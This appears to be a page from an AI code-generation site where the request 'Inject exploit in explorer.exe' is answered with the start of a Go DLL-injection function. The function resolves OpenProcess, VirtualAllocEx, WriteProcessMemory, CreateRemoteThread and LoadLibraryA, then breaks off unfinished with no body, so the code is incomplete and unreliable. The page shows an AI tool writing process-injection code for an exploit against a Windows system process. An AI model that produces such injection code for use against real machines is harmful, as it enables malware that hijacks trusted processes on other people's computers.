Generation

generate functionWed, 18 Jan 2023

Inject exploit in explorer.exe

func InjectExplorer(pid int, dllPath string) (err error){ var ( kernel32 = syscall.MustLoadDLL(`kernel32.dll`) openProcess = kernel32.MustFindProc(`OpenProcess`) virtualAllocEx = kernel32.MustFindProc(`VirtualAllocEx`) writeProcessMemory = kernel32.MustFindProc(`WriteProcessMemory`) createRemoteThread = kernel32.MustFindProc(`CreateRemoteThread`) loadLibrary = kernel32.MustFindProc(`LoadLibraryA`) waitForSingleObject = kernel32.MustFindProc(`WaitForSingleObject`) getExitCodeThread = kernel32.MustFindProc(`GetExitCodeThread`) closeHandle = kernel32.MustFindProc(`CloseHandle`) getCurrentProcess = kernel32.MustFindProc(`GetCurrentProcess`)

Questions about programming?Chat with your personal AI assistant